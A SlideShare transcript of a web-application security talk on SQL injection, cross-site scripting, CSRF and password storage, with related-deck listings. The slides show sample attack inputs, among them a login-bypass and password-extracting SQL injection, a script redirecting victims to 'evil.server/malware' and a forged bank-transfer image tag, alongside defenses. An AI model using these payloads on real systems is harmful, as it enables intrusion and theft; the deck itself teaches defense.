SlideShare a Scribd company logo

SECURING WEB APPS

Download as PPTX, PDF
L
Lee C

This document provides a summary of a presentation on web application security. It introduces the presenter and outlines topics that will be covered, including injection attacks like SQL injection and cross-site scripting (XSS), cross-site request forgery (CSRF), password storage techniques, and defenses against these attacks. Examples of each attack type are demonstrated. Defenses like input validation, output encoding, anti-XSS libraries, synchronizer tokens for CSRF, and password hashing with salts are discussed. The importance of secure coding practices and continued learning are emphasized.

Technology
1 of 43
Web Application Security by Lee Christensen @tifkin_
Thanks to our Sponsors!
Who is this guy? • Lee Christensen • Penetration Tester and Security Consultant • Computer Security Enthusiast • Web Application Security • Browser Security • Developer (at heart…) • Almost a Weber State graduate
Who are you?
Where are we going? • Attacker techniques and defenses (Application level) • Awareness – NON-COMPREHENSIVE • Injection Attacks • SQL injection • Cross-site scripting • Cross Site Request Forgery • Password Storage • Quick note on permission
Injection Attacks
DEMO SQL injection attacks and techniques
Input: PASSWORD SELECT user_id FROM phorum_users WHERE username = 'admin' AND password = 'PASSWORD'
Input:’ OR 1=1# SELECT user_id FROM phorum_users WHERE username = 'admin' AND password = '_________'
Input:’ OR 1=1# SELECT user_id FROM phorum_users WHERE username = 'admin' AND password = '' OR 1=1#'
BLAH' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT( '>>>', (SELECT password FROM phorum_users WHERE username = 'admin') ,'<<<', FLOOR(RAND(0)*2))x FROM phorum_users GROUP BY x)a)#'
Defenses • “Give me parameterized SQL, or give me death” – Jeff Atwood • No concatenating strings! • Server-side input validation • Whitelist Acceptable Characters • Avoid blacklists where possible • Use an Object Relational Mapper (ORM) • NO CONCATENATING STRINGS!
$db = new PDO('mysql:host=host;dbname=<DB>', 'DB_USER', 'DB_PASSWORD'); $db = $db->prepare('SELECT user_id FROM phorum_users HERE username = :username AND password = :password'); $db->bindParam(':username', $username, PDO:PARAM_STR); $db->bindParam(':password', $password, PDO:PARAM_STR); $db->execute();
Cross-site Scripting <script>alert(1)</script>
What is XSS? • Injected client side content (usually JavaScript*) • Extremely Prevalent • Some of the types • Reflective • Persistent (Stored) • DOM-based • Mutation XSS (mXSS) • Flash-based XSS
Reflective XSS • welcome.jsp?name=Bob • Welcome Bob! • welcome.jsp?name=<blink>Bob</blink> • Welcome <blink>Bob</blink> R.I.P. <blink> - Aug. 6, 2013 • welcome.jsp?name=<script>document.location=“evil.server/malware ”</script> • Welcome <script>document.location=“evil.server/malware”</script>! Vulnerable Code Welcome $name
Persistent XSS • XSS attack payload is stored • Database • Session variable • Cookie • File • Image metadata
Demo Cross-site scripting (XSS)
How XSS exploits clients • Session hijacking • (HttpOnly flag on cookies) • Malware • Stealing Credentials • Internal network scanning • Data Theft • Impersonating Users • Bypass CSRF Defenses • Key loggers
XSS Defenses • Contextual Output Encoding
Vulnerable Code Resulting Output <div> INPUT </div> <div> <script>alert(1)</script> </div> <input value=“INPUT”> <input value=“” onfocus=“alert(1)”> <script> var a = “INPUT”; </script> <script> var a = ““ + alert(1) + “”; </script> Contextual Output Encoding Examples
Vulnerable Code Resulting Output <div> encodeForHtml(INPUT) </div> <div> &lt;script&gt;alert(1)&lt;/script&gt; </div> <input value=“encodeForHtmlAttr(INPUT)”> <input value=“&quot;&#x20;onfocus&#x3D;&quot;alert(1)”> <script> var a = “encodeForJS(INPUT)”; </script> <script> var a = “x22x20x2bx20alertx281x29x20x2bx20x22”; </script> Contextual Output Encoding Examples https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS Defenses • Contextual Output Encoding • OWASP Java Encoder Project • ESAPI (PHP, Coldfusion, Python) • Anti-XSS (.NET) • Server side input validation • Use a whitelist where possible • HTML Sanitizers • AntiXSS/HTML Agility Pack (.NET) • Java HTML Purifier • HTML Purifier/htmLawed (PHP) • DOM Purify (JavaScript, NodeJS?)
XSS Defenses – continued • Understand your framework’s defenses • @Model.name • <a href=“javascript&#x3A;alert(1)”>Click Me!</a> • Use a JavaScript MVC framework that supports templated views • <div>{{user.name}}</div> • https://code.google.com/p/mustache-security/ • Content Security Policy
Cross Site Request Forgery (CSRF)
What is CSRF? • “Forced Browsing” • my.bank/transfer?amount=1000&to=1234 • <img src=“my.bank/transfer?amount=1000&to=666”> • 4.5 million Routers Hacked via CSRF • Places to be especially aware of • Actions • Account/Role Management
Demo Privilege Escalation via CSRF
CSRF Defense • Eliminate Cross Site Scripting(XSS) • Re-enter password • GET requests do NOT change server state • Synchronizer-token pattern 1. Random token is generated associated with user’s session 2. Include token in each state-changing request made to the server 3. Server validates that token submitted is valid
CSRF defenses in action • CSRF Token • Unique per user session • Sent on state-changing requests if(tokenInRequest == TokenOnServer) Proceed else Error!
Example: ASP.NET MVC Controller [ValidateAntiForgeryToken] public ActionResult DoSomething() { // Do stuff } View <div> @using (Html.BeginForm()) { @Html.AntiForgeryToken() //Other form elements } </div>
Password Storage
Hashing • Potatoes + Frying Pan = Protection!
Hashing • Potatoes + Frying Pan = Protection! • One-way function • sha1(password) = 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 • sha1(salt + password) • sha1(“A3dyUc” + “password”) = e9d435577a819b718fea098a7f4b4b6c9e1963da • sha1(“8DcPvd” + “password”) = aa5f9e6c1f87b3520b08fb1540c3fa62cf2afb03 • Password + Salt = Sufficient?
Password Cracking Leaked Hash: 25ab86bed149ca6ca9c1c0d5db7c9a91388ddeab Guesses: • sha1(password) => 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 • sha1(123456) => 7c4a8d09ca3762af61e59520943dc26494f8941b • sha1(admin) => d033e22ae348aeb5660fc2140aec35850c4da997 • sha1(monkey) => ab87d24bdc7452e55738deb5f868e1f16dea5ace • sha1(s3cr3t) => 25ab86bed149ca6ca9c1c0d5db7c9a91388ddeab
Demo Password Cracking
1) Do not limit the type of characters or length of user password • Limiting passwords to protect against injection is doomed to failure • Be wary of systems that allow unlimited password sizes (Django DOS Sept 2003) • One Exception: Password1! Password Storage in the Real World
2) Use a cryptographically strong credential-specific salt •protect( [salt] + [password] ); •Use a 32char or 64char salt (actual size dependent on protection function); •Do not depend on hiding, splitting, or otherwise obscuring the salt Password Storage in the Real World
Leverage Keyed Functions 3a) Impose difficult verification on [only] the attacker (strong/fast) •HMAC-SHA-256( [private key], [salt] + [password] ) •Protect this key as any private key using best practices •Store the key outside the credential store •Build the password-to-hash conversion as a separate web service (cryptographic isolation).
3b) Impose difficult verification on the attacker and defender (weak/slow) •PBKDF2([salt] + [password], c=10,000,000); •Use PBKDF2 when FIPS certification or enterprise support on many platforms is required •Use Scrypt where resisting any/all hardware accelerated attacks is necessary but enterprise support and scale is not. Password Storage in the Real World
Closing Thoughts • Code with an attacker’s perspective • Test your app • Continue to learn • Get Involved • OWASP (Open Web Application Security Project) • http://utahsec.org
Questions?
Thanks! @tifkin_

Recommended

Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJSThang Chung
 
Preventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StancePreventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StanceSara Goodison
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Jim Manico
 

Recommended

Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJSThang Chung
 
Preventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StancePreventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StanceSara Goodison
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Jim Manico
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kimjaxconf
 
Onward15
Onward15Onward15
Onward15sarah_nadi
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#Siddharth Bezalwar
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
iCloud keychain
iCloud keychainiCloud keychain
iCloud keychainAlexey Troshichev
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the BadXavier Mertens
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)securityEnrico Zimuel
 
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningDynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningSean Chittenden
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 

More Related Content

What's hot

Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kimjaxconf
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the BadXavier Mertens
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)securityEnrico Zimuel
 
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningDynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningSean Chittenden
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
 

What's hot (20)

Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
 
Onward15
Onward15Onward15
Onward15
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
 
iCloud keychain
iCloud keychainiCloud keychain
iCloud keychain
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)security
 
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningDynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency Planning
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC Edition
 

Viewers also liked

End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 
2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security TutorialNeil Matatall
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
DemoDay Berlin Partners
DemoDay Berlin PartnersDemoDay Berlin Partners
DemoDay Berlin PartnersFabio Lombardi
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Webdpd
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Fabien Potencier
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Security
 

Viewers also liked (10)

End to end web security
End to end web securityEnd to end web security
End to end web security
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutions
 
2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security Tutorial
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
DemoDay Berlin Partners
DemoDay Berlin PartnersDemoDay Berlin Partners
DemoDay Berlin Partners
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security Overview
 
Web Security
Web SecurityWeb Security
Web Security
 

Similar to SECURING WEB APPS

Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profitDavid Stockton
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
Owasp.meet up.2017.ppt
Owasp.meet up.2017.pptOwasp.meet up.2017.ppt
Owasp.meet up.2017.pptSul Haedir
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git RepoCliff Smith
 
Secure WordPress Development Practices
Secure WordPress Development PracticesSecure WordPress Development Practices
Secure WordPress Development PracticesBrandon Dove
 
Web Application Penetration Testing - 101
Web Application Penetration Testing - 101Web Application Penetration Testing - 101
Web Application Penetration Testing - 101Andrea Hauser
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeAlexandre Morgaut
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeWim Godden
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterMichael Coates
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
JWTs for CSRF and Microservices
JWTs for CSRF and MicroservicesJWTs for CSRF and Microservices
JWTs for CSRF and MicroservicesStormpath
 

Similar to SECURING WEB APPS (20)

Tests
TestsTests
Tests
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Owasp.meet up.2017.ppt
Owasp.meet up.2017.pptOwasp.meet up.2017.ppt
Owasp.meet up.2017.ppt
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
 
Secure WordPress Development Practices
Secure WordPress Development PracticesSecure WordPress Development Practices
Secure WordPress Development Practices
 
JavaScript Obfuscation
JavaScript ObfuscationJavaScript Obfuscation
JavaScript Obfuscation
 
Web Application Penetration Testing - 101
Web Application Penetration Testing - 101Web Application Penetration Testing - 101
Web Application Penetration Testing - 101
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the code
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through Injections
 
Django cryptography
Django cryptographyDjango cryptography
Django cryptography
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning Center
 
Owasp & Asp.Net
Owasp & Asp.NetOwasp & Asp.Net
Owasp & Asp.Net
 
Rails Security
Rails SecurityRails Security
Rails Security
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
ruxc0n 2012
ruxc0n 2012ruxc0n 2012
ruxc0n 2012
 
JWTs for CSRF and Microservices
JWTs for CSRF and MicroservicesJWTs for CSRF and Microservices
JWTs for CSRF and Microservices
 

Recently uploaded

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
